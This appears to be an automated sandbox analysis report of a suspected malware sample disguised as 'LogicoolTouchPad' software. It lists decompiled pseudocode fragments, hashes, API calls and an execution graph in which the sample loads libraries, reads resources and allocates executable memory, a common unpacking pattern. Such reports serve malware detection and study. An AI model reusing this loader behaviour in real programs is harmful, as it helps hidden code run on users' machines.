                    					_t50 =  *0x40bcbd(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
                    					_v40 = _t50;
                    					_t35 =  &_v36;
                    					_a4 = 0x242e4b00;
                    					_v4 = 0x11d01d3a;
                    					_v0 = 0xaa001f89;
                    					_v12 = 0x242e4b00;
                    				}
                    				_a24 = 0x11cf737f;
                    				_a20 = 0xdc12a687;
                    				_a36 = 0x4590f811;
                    				_a28 = 0xaa004d88;
                    				_t36 =  *0x40bcb9( &_a36, 0, 1,  &_a20, _t35); // executed
                    				_v16 = _t36;
                    				if(_t36 >= 0) {
                    					_t60 =  &_a32;
                    					E00406DC0(_t36,  &_a20,  &_a36, _t57, _t60);
                    					_t61 = _t61 + 8;
                    					_t43 = _v16;
                    					_t56 = _t61;
                    					_t54 =  *_t43;
                    					_t44 =  *((intOrPtr*)( *_t43 + 0xc))(_t43, _t60, 0, 0, 0, 0, 0, 0, _t61, 0x87, _t60, 0x7b);
                    					_v56 = _t44;
                    					if(_t44 >= 0) {
                    						_v88 =  *0x40bcb5(_v60, 0xa, 0, 0, 3, 3, 0, 0);
                    						_push(_v76);
                    						_push(_v92);
                    						_push(0x63);
                    						E00406DC0(_t45, _t54, _t56, _t57, _t60);
                    						_t61 = _t61 + 8;
                    						_v84 = 1;
                    					}
                    				}
                    				if( *_t61 != 0) {
                    					_t40 =  *_t61;
                    					 *((intOrPtr*)( *_t40 + 8))(_t40);
                    				}
                    				if(_v12 != 0) {
                    					_t38 = _v12;
                    					 *((intOrPtr*)( *_t38 + 8))(_t38);
                    				}
                    				return _v8;
                    			}

























                    0x00403683
                    0x00403683
                    0x00403685
                    0x00403688
                    0x0040368d
                    0x0040368f
                    0x00403692
                    0x00403695
                    0x0040369e
                    0x004036a6
                    0x004036ad
                    0x004036b5
                    0x004036c3
                    0x004036d9
                    0x004036df
                    0x004036e3
                    0x004036e7
                    0x004036ef
                    0x004036f7
                    0x004036ff
                    0x004036ff
                    0x00403707
                    0x0040370f
                    0x00403717
                    0x0040371f
                    0x00403736
                    0x0040373e
                    0x00403742
                    0x00403744
                    0x00403750
                    0x00403755
                    0x00403758
                    0x0040375c
                    0x0040375e
                    0x0040376f
                    0x00403774
                    0x00403778
                    0x00403792
                    0x00403796
                    0x0040379a
                    0x0040379e
                    0x004037a0
                    0x004037a5
                    0x004037a8
                    0x004037a8
                    0x00403778
                    0x004037b4
                    0x004037b6
                    0x004037bc
                    0x004037bc
                    0x004037c4
                    0x004037c6
                    0x004037cd
                    0x004037cd
                    0x004037db

                    Memory Dump Source
                    • Source File: 00000001.00000002.329034065.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2d5b6c685d0cf83ec72fbb8b29bcda26f7de013d4d821f8325eb8d1b80e14f9
                    • Instruction ID: 151e8a47d3d5adcfe89f7a6f3b5dcc613d686ce9b644c516d60916ac57fdc563
                    • Opcode Fuzzy Hash: b2d5b6c685d0cf83ec72fbb8b29bcda26f7de013d4d821f8325eb8d1b80e14f9
                    • Instruction Fuzzy Hash: 09413BB0648301AFE3209F10DC55B1BBBE4AB84B05F10891DF589AB2D0D7B9A905CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID: ~F$AttributeValueRefersToExternalEntity_Err$Attribute_Definition_Not_Found_Err$Attribute_Type_Mismatch_Err$ENTITIES$ENTITY$LtInAttributeValue_Err$NMTOKEN$NMTOKENS
                    • API String ID: 0-3545346420
                    • Opcode ID: 8f3d58701191f3447425e5f71ccf22c95d9aed40de8d2d6156dfbdd2929483f9
                    • Instruction ID: 756c9a51b843a3e2b49ce45cf59b8247162fd86a261f7ed9179fff250ac0108f
                    • Opcode Fuzzy Hash: 8f3d58701191f3447425e5f71ccf22c95d9aed40de8d2d6156dfbdd2929483f9
                    • Instruction Fuzzy Hash: 1002A270A04208DFDB01DFA4D491AEEBBF5FF49304F1180AAE904AB391DB39AD45CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • Element_Type_Declaration_Not_Found_Err, xrefs: 0047EBE0, 0047F232
                    • Element_Declared_Empty_Has_Content_Err, xrefs: 0047ECC9
                    • Element_With_Illegal_Mixed_Content_Err, xrefs: 0047EF90
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID: Element_Declared_Empty_Has_Content_Err$Element_Type_Declaration_Not_Found_Err$Element_With_Illegal_Mixed_Content_Err
                    • API String ID: 0-918618135
                    • Opcode ID: edfdf48c9ac441fea8d81780b89fa5f4e484b57b3fbc89a5a985710982f8471d
                    • Instruction ID: 765405094408d7135e4c0ee98b2838859dceb5d209708c20925ebfc888e8e73d
                    • Opcode Fuzzy Hash: edfdf48c9ac441fea8d81780b89fa5f4e484b57b3fbc89a5a985710982f8471d
                    • Instruction Fuzzy Hash: 37F15B34A00205DFDB15DF69C894ADEBBB5FF4D304F1181AAE805AB361CB38AD45CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6530e468d1e3709fe833e8b7e89f55f6eb2483fd03b77a908938698d12ec26d9
                    • Instruction ID: a66ca9a20b27ed06920e00057e5bb033b308a2b9d667237dc695853cdb115951
                    • Opcode Fuzzy Hash: 6530e468d1e3709fe833e8b7e89f55f6eb2483fd03b77a908938698d12ec26d9
                    • Instruction Fuzzy Hash: F3F1A474A00208DFC704DF99C89499DBBF6FF89305B6481A9E40ADB365CB71ED4ACB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetMonitorInfoA.USER32(?,?), ref: 0042A6D9
                    • GetSystemMetrics.USER32(00000000), ref: 0042A715
                    • GetSystemMetrics.USER32(00000001), ref: 0042A720
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem$InfoMonitor
                    • String ID: DISPLAY$GetMonitorInfo
                    • API String ID: 4250584380-1633989206
                    • Opcode ID: 507bf44c68e311ac499a57208938ae35054168603414f5465b73ae0ec5451901
                    • Instruction ID: 6c2b4adc3577e91d36a678d6d6c384aeaba3353cf7b34e54db395bd7a9fd44b8
                    • Opcode Fuzzy Hash: 507bf44c68e311ac499a57208938ae35054168603414f5465b73ae0ec5451901
                    • Instruction Fuzzy Hash: 91110F717027249FD720EF24AC44BABB7B8EB45720F50443BEC0597280D6B8E814CBAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: InitVariant
                    • String ID:
                    • API String ID: 1927566239-0
                    • Opcode ID: fd37230115371943d26fe4f445bb2f53f54ead115de5cb4325fd13df20f2598e
                    • Instruction ID: 32911fd6a82bbd348a1176bd83e59c6ca0e4c9bb491d43af70882a249b7519df
                    • Opcode Fuzzy Hash: fd37230115371943d26fe4f445bb2f53f54ead115de5cb4325fd13df20f2598e
                    • Instruction Fuzzy Hash: 0FB12C39A00109EFCB10EF95C4918EDB7B5EF8D714FA044B6E900A7751D738AE86DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042A95D
                    • GetSystemMetrics.USER32(00000000), ref: 0042A982
                    • GetSystemMetrics.USER32(00000001), ref: 0042A98D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem$DisplayEnumMonitors
                    • String ID: EnumDisplayMonitors
                    • API String ID: 1389147845-2491903729
                    • Opcode ID: 4e3a3059197fc1f0d46d51edac9c78d502ffd08b32bb3d9d9b41e5a10404bfa4
                    • Instruction ID: 8a28b65efb05625a1c49d6f4658e09d9faf253bff4592c072c0946955b27e940
                    • Opcode Fuzzy Hash: 4e3a3059197fc1f0d46d51edac9c78d502ffd08b32bb3d9d9b41e5a10404bfa4
                    • Instruction Fuzzy Hash: 593130B1B01219ABCB10DFA5ED44AEF77BCAF05314F404127FD15E3241DA389A51CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A7E9
                    • GetSystemMetrics.USER32(00000001), ref: 0042A7F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: DISPLAY$GetMonitorInfoA
                    • API String ID: 4116985748-1370492664
                    • Opcode ID: a731b55a73754689698e8ace40dffcb64d4f7acfa33f597ad87e13425f4ac8a4
                    • Instruction ID: dd126e816c9cd9ecb882c9608e50628a39e24879929c927f469459e115516461
                    • Opcode Fuzzy Hash: a731b55a73754689698e8ace40dffcb64d4f7acfa33f597ad87e13425f4ac8a4
                    • Instruction Fuzzy Hash: 5111E4717027609FD720AF64AC44BB7B7E8EB09324F80453BEC1597240DB78A951C7AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A8BD
                    • GetSystemMetrics.USER32(00000001), ref: 0042A8C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: DISPLAY$GetMonitorInfoW
                    • API String ID: 4116985748-2774842281
                    • Opcode ID: 45081c7b24369bbe895243bba8ad33161edcfdb27f15ab84a860727720d02a20
                    • Instruction ID: f2529c39d11673e4f4ebd3016a24e407d5374938f4a1d2b63915d66a4773299c
                    • Opcode Fuzzy Hash: 45081c7b24369bbe895243bba8ad33161edcfdb27f15ab84a860727720d02a20
                    • Instruction Fuzzy Hash: 2D11E7717027219FD710AF25AC44767B7E4EF49310F80453BEC45D7240D6B46991C7AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A65E
                    • GetSystemMetrics.USER32(00000001), ref: 0042A670
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: MonitorFromPoint
                    • API String ID: 4116985748-1072306578
                    • Opcode ID: aecec15bed5305295d07abd60dc6b2d9635c8a7a47802c78cc95a3f9d16e88ad
                    • Instruction ID: bfa15d91ba6129cd55bd6d393177f64770d5ef16a76cd6e2296fb9b71418b36b
                    • Opcode Fuzzy Hash: aecec15bed5305295d07abd60dc6b2d9635c8a7a47802c78cc95a3f9d16e88ad
                    • Instruction Fuzzy Hash: BE012631302228AFDB008F55FC44B5E7B58EB04364F898537FD848B210CB78AC658BAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A539
                    • GetSystemMetrics.USER32(00000001), ref: 0042A545
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: MonitorFromRect
                    • API String ID: 4116985748-4033241945
                    • Opcode ID: ad1dca2929db28806eb3eddb2c309d1b607e4a4cf2241eba59b83720e98ba69d
                    • Instruction ID: e0e6cd1effd1234d494721701fd0864a44d253c3b7350921cb9281feb361c97d
                    • Opcode Fuzzy Hash: ad1dca2929db28806eb3eddb2c309d1b607e4a4cf2241eba59b83720e98ba69d
                    • Instruction Fuzzy Hash: 6E016771305224AFD7109B18F9457677768DB457A5F948067ED04DB202CA78EC908BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:2.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:119
                    Total number of Limit Nodes:5
                    execution_graph 34188 44c66c 34189 44c683 34188->34189 34190 44c6a3 34188->34190 34192 4d0d78 34189->34192 34195 4d07c0 LoadLibraryA 34192->34195 34202 41e1dc 34195->34202 34199 41d9f4 34200 4d0888 VirtualAlloc 34199->34200 34201 4d08c8 34200->34201 34201->34201 34203 41e1e6 34202->34203 34206 41e2a4 FindResourceA 34203->34206 34205 41e214 VirtualAlloc 34205->34199 34207 41e2c9 34206->34207 34207->34205 34208 4539a8 34209 4539bb 34208->34209 34212 44c1e0 34209->34212 34210 4539dc 34214 44c1f6 34212->34214 34213 44c30a 34213->34210 34214->34213 34217 41b48c 34214->34217 34216 44c286 34216->34210 34218 41b4a2 34217->34218 34221 41b3e4 34218->34221 34220 41b4f3 34220->34216 34222 41b40e 34221->34222 34223 41b462 34221->34223 34222->34223 34224 41b3e4 2 API calls 34222->34224 34223->34220 34225 41b426 34224->34225 34227 41b27c 34225->34227 34229 41b28d 34227->34229 34228 41b2f9 34228->34223 34229->34228 34230 41e1dc FindResourceA 34229->34230 34231 41b2bd 34230->34231 34234 41db58 34231->34234 34235 41db74 34234->34235 34238 420394 34235->34238 34237 41b2d8 34237->34223 34239 4203cd 34238->34239 34240 42056c 34239->34240 34242 4253b4 34239->34242 34240->34237 34243 4253ca 34242->34243 34244 4253e3 GetTextExtentPoint32A 34243->34244 34244->34240 34245 42276c 34249 4385a0 34245->34249 34252 452cd8 34245->34252 34246 422782 34258 4387f8 34249->34258 34250 4385cf 34250->34246 34254 452d0e 34252->34254 34256 452d2f 34254->34256 34280 452b8c 34254->34280 34255 452d4b 34255->34256 34284 43f478 34255->34284 34256->34246 34259 43880b 34258->34259 34263 43880d 34258->34263 34260 43887d 34259->34260 34259->34263 34261 435968 2 API calls 34260->34261 34262 438886 34261->34262 34262->34250 34263->34262 34265 435968 34263->34265 34267 43597e 34265->34267 34266 4359c4 34269 435a55 34266->34269 34271 44f3c0 34266->34271 34267->34266 34267->34269 34275 454530 GetTextExtentPoint32A 34267->34275 34269->34262 34272 44f3cf 34271->34272 34276 44dde8 34272->34276 34274 44f3e0 34274->34269 34275->34266 34277 44de0c 34276->34277 34278 44df79 KiUserCallbackDispatcher 34277->34278 34279 44decd 34277->34279 34278->34279 34279->34274 34281 452b9f 34280->34281 34283 452bc9 34281->34283 34288 451b48 34281->34288 34283->34255 34285 43f487 34284->34285 34287 43f480 34284->34287 34292 43f3dc 34285->34292 34287->34256 34289 451b61 34288->34289 34290 451bd1 SystemParametersInfoA 34289->34290 34291 451bf1 34290->34291 34291->34283 34295 42a460 34292->34295 34296 42a470 34295->34296 34298 42a490 34295->34298 34297 42a482 KiUserCallbackDispatcher 34296->34297 34297->34298 34298->34287 34299 43fb0c 34300 43fb26 34299->34300 34302 43fb40 34299->34302 34303 43f8d8 34300->34303 34304 43f8fe GlobalAddAtomA 34303->34304 34306 43f94c 34304->34306 34313 43f304 34306->34313 34312 43f9e8 34312->34302 34314 43f30a 34313->34314 34315 43f478 KiUserCallbackDispatcher 34314->34315 34316 43f378 34315->34316 34317 45136c 34316->34317 34318 451376 34317->34318 34329 451728 34318->34329 34320 4513af 34321 451b48 SystemParametersInfoA 34320->34321 34322 43f9d2 34321->34322 34323 452450 34322->34323 34324 45245f 34323->34324 34325 4525b2 CharLowerA 34324->34325 34326 4525d5 34325->34326 34328 4525e6 34326->34328 34333 452758 34326->34333 34328->34312 34331 45173a 34329->34331 34330 451760 LoadCursorA 34330->34331 34331->34330 34332 45177d 34331->34332 34332->34320 34334 452781 34333->34334 34337 4528a5 34333->34337 34334->34337 34341 422794 34334->34341 34336 45279a 34336->34337 34338 452881 SendMessageA 34336->34338 34337->34328 34344 4533dc 34338->34344 34340 452899 KiUserCallbackDispatcher 34340->34337 34342 4227a4 VirtualAlloc 34341->34342 34343 4227d2 34341->34343 34342->34343 34343->34336 34345 4533e7 34344->34345 34345->34340

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNELBASE(004D0D64), ref: 004D07CE
                    • VirtualAlloc.KERNELBASE(00000000,00000065,00001000,00000040), ref: 004D0874
                    • VirtualAlloc.KERNELBASE(00000000,00000065,00001000,00000040), ref: 004D08A9
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocVirtual$LibraryLoad
                    • String ID: $m@$)$)$)$2$e
                    • API String ID: 2441068224-3348685802
                    • Opcode ID: 5d1ca35d99429fff00d87e1114f2da538d1f53c4dc36e1651b1830a6db695e40
                    • Instruction ID: 8d35841032e7d55d3a383f848f1f4ab3205dd99163327573e316738c413c07c2
                    • Opcode Fuzzy Hash: 5d1ca35d99429fff00d87e1114f2da538d1f53c4dc36e1651b1830a6db695e40
                    • Instruction Fuzzy Hash: 8BF1A7B0D41249DFEB40CFD6E64C7AEBBB1BB04308F60901AD4547E299C3B95A4ACF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 15 452450-45245d 16 452467-45247f call 421704 15->16 17 45245f 15->17 20 452481-452489 16->20 21 45248f-452499 16->21 17->16 20->21 22 4524a9-45258e call 429520 call 4298f0 call 40cf70 21->22 23 45249b-4524a3 21->23 35 452590-452593 22->35 36 45259e-4525ad call 40cf98 22->36 23->22 35->36 39 4525b2-4525dd CharLowerA 36->39 40 4525af 36->40 42 4525e6-452615 call 45449c call 454e60 39->42 43 4525df-4525e1 call 452758 39->43 40->39 49 452617-452623 42->49 50 452626-45262d 42->50 43->42 49->50
                    APIs
                    • CharLowerA.USER32(?,?,?,?,0043F9E8), ref: 004525BA
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID: $9B$0PM$8PM$MAINICON$t%M$|%M
                    • API String ID: 1615517891-370378472
                    • Opcode ID: 99926f7a47da97f6f53c3a116efbc3f7f5cd30eb57166722d2f91e5c96eea35d
                    • Instruction ID: ea7b91e38b1c89eade17c0baa2e94f1d2481a26ba6eba72d783132f7ab6197c9
                    • Opcode Fuzzy Hash: 99926f7a47da97f6f53c3a116efbc3f7f5cd30eb57166722d2f91e5c96eea35d
                    • Instruction Fuzzy Hash: D75160706042459FDB00EF29D8C57853BE4AB55308F4441FAEC48DF397D7B99988CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GlobalAddAtomA.KERNEL32(00000000), ref: 0043F92C
                      • Part of subcall function 00452450: CharLowerA.USER32(?,?,?,?,0043F9E8), ref: 004525BA
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AtomCharGlobalLower
                    • String ID: $[M$([M$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                    • API String ID: 107674516-3730233899
                    • Opcode ID: 37f512c12520f15ee2aa2069ecf6f16c7b0a53fa03724edcffa3f1721ec24f97
                    • Instruction ID: 3f03f1a0889528010dd100dd3a88f3008b4730d3b04368c11bbb66e9032c8f8d
                    • Opcode Fuzzy Hash: 37f512c12520f15ee2aa2069ecf6f16c7b0a53fa03724edcffa3f1721ec24f97
                    • Instruction Fuzzy Hash: 86412BB0A006459BCB00FFA5E842A5E77E5AB49308B10947BE505E73A2DB3DA904CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 84 452758-45277b 85 452781-452789 84->85 86 4528e3-4528f8 84->86 85->86 87 45278f-4527be call 422794 85->87 92 4527c0-4527d7 87->92 93 4527fa-452807 87->93 92->93 98 4527d9-4527f5 call 40c178 92->98 96 45280c-45281a 93->96 97 452809 93->97 101 45281c 96->101 102 45281f-452878 96->102 97->96 98->93 101->102 109 4528a5-4528d4 102->109 110 45287a-4528a0 call 4533dc SendMessageA call 4533dc KiUserCallbackDispatcher 102->110 109->86 118 4528d6-4528dd 109->118 110->109 118->86
                    APIs
                      • Part of subcall function 00422794: VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 004227B2
                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000,?,0044A840), ref: 0045288D
                    • KiUserCallbackDispatcher.NTDLL(0000000E,000000F2,00000000,?,0044A840), ref: 004528A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocCallbackDispatcherMessageSendUserVirtual
                    • String ID: @$E$LPM
                    • API String ID: 3417832073-827266730
                    • Opcode ID: 302472818dbe9c33ef6f17bd0d2d87401d922d399f8b3293a7fe7b8d52fbf4a9
                    • Instruction ID: f320e30c47b631510f9e5cc36092094f8708a6830a53161fff9a9aee9730d1e5
                    • Opcode Fuzzy Hash: 302472818dbe9c33ef6f17bd0d2d87401d922d399f8b3293a7fe7b8d52fbf4a9
                    • Instruction Fuzzy Hash: CE4130707442406FE710EFA9DD82F6637A8AB45704F54457BFD40EB2E3DAB9A844872C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 147 42a460-42a46e 148 42a490-42a49b 147->148 149 42a470-42a48e call 42a378 KiUserCallbackDispatcher 147->149 151 42a4af-42a4b1 148->151 152 42a49d 148->152 157 42a4c7-42a4c9 149->157 156 42a4bc-42a4bf 151->156 154 42a4b3-42a4b5 152->154 155 42a49f-42a4a0 152->155 154->156 158 42a4a2-42a4a6 155->158 159 42a4b7 155->159 156->157 160 42a4c1 156->160 158->156 161 42a4a8-42a4ad 158->161 159->156 160->157 161->156
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?), ref: 0042A488
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID: GetSystemMetrics
                    • API String ID: 2492992576-96882338
                    • Opcode ID: 86433630f87f6f9e26947894bf362137cb0d39e826c61aaf64f1471468175a8e
                    • Instruction ID: f45f04def38af41af64cbd46ec1b311c667da632064cbf9fbc218da1d6088580
                    • Opcode Fuzzy Hash: 86433630f87f6f9e26947894bf362137cb0d39e826c61aaf64f1471468175a8e
                    • Instruction Fuzzy Hash: 24F0C230B096104BC6107634BCCC6263686974A330FD08F27AD25493D1C5BCD97A520F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 374 44dde8-44de0a 375 44de7c-44de84 374->375 376 44de0c-44de19 call 451618 374->376 378 44de86-44de88 call 447920 375->378 379 44de8d-44de91 375->379 376->375 384 44de1b-44de1f 376->384 378->379 382 44de93-44de95 379->382 383 44de9d 379->383 385 44de97-44de9b 382->385 386 44de9f-44dea7 382->386 383->386 389 44de21-44de33 call 451604 384->389 385->383 385->386 387 44deb2-44deb4 386->387 388 44dea9-44dead call 4217d4 386->388 391 44df65-44df6e call 43b044 387->391 392 44deba-44debe 387->392 388->387 401 44de35-44de43 call 451604 389->401 402 44de76-44de7a 389->402 405 44df70-44df7a call 43ade4 KiUserCallbackDispatcher 391->405 406 44df7f-44df86 391->406 394 44dec0-44dec7 392->394 395 44decd-44ded7 392->395 394->391 394->395 398 44dee2-44dee6 395->398 399 44ded9-44dee0 395->399 403 44dee8-44def1 call 43b044 398->403 404 44df40-44df47 398->404 399->398 399->403 401->402 415 44de45-44de71 call 40c1b4 401->415 402->375 402->389 403->406 422 44def7-44df13 call 43ade4 403->422 404->406 413 44df49-44df52 call 43b044 404->413 405->406 411 44df91-44dfad call 44dd20 406->411 412 44df88-44df8c call 44eeac 406->412 412->411 413->406 423 44df54-44df63 call 43ade4 413->423 415->402 435 44df15-44df28 call 43ade4 422->435 436 44df2e-44df3e call 43ade4 call 447920 422->436 423->406 435->436 436->406
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,0044DFAE), ref: 0044DF7A
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: 363e831c1641a26c8a9c58432b9f765c1c5ce59dd3389193c7bd383a65cb89b3
                    • Instruction ID: 4e3f4791494385b395d3e2600b5f11623e9fa6e8d2110f1a1db2ab8065cdd3a1
                    • Opcode Fuzzy Hash: 363e831c1641a26c8a9c58432b9f765c1c5ce59dd3389193c7bd383a65cb89b3
                    • Instruction Fuzzy Hash: 7851BF70E006005BEB60EF2AC88579A77A59F64308F1844BBBC459F3A7CA3CDC498B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 444 451b48-451b5f 445 451b61-451b6c 444->445 446 451b6f-451b84 444->446 445->446 447 451b86-451b8d call 454038 446->447 448 451b92-451ba3 446->448 447->448 451 451ba5-451ba8 448->451 452 451bbd-451bcc call 4248fc 448->452 453 451bae-451bbb call 4248fc 451->453 458 451bd1-451bef SystemParametersInfoA 452->458 453->458 459 451c25-451c44 call 4249e0 call 4248fc 458->459 460 451bf1-451c23 call 4248fc * 2 458->460 469 451c49-451c7d call 424740 * 2 459->469 460->469 476 451c8c 469->476 477 451c7f-451c87 call 454038 469->477 477->476
                    APIs
                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00451BE8
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: InfoParametersSystem
                    • String ID:
                    • API String ID: 3098949447-0
                    • Opcode ID: f9866d348665206b83f32f49bbbd435cbdb9ecea935e03ecfe8fd9fcad8f4ec3
                    • Instruction ID: 5993d972940aec6fb307cc78d4a6f19bd85111af0e41e0a8ec639e155efabc24
                    • Opcode Fuzzy Hash: f9866d348665206b83f32f49bbbd435cbdb9ecea935e03ecfe8fd9fcad8f4ec3
                    • Instruction Fuzzy Hash: 6F31B434704244ABE710FB69DC42B9A33E5BB44304F4140B7BD08DB2A7DEB8A909C72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 479 41e2a4-41e2c7 FindResourceA 480 41e2d0-41e2e1 479->480 481 41e2c9-41e2cf call 41e234 479->481 485 41e2e3-41e2e9 call 41e234 480->485 486 41e2ea-41e30d call 41de48 480->486 481->480 485->486
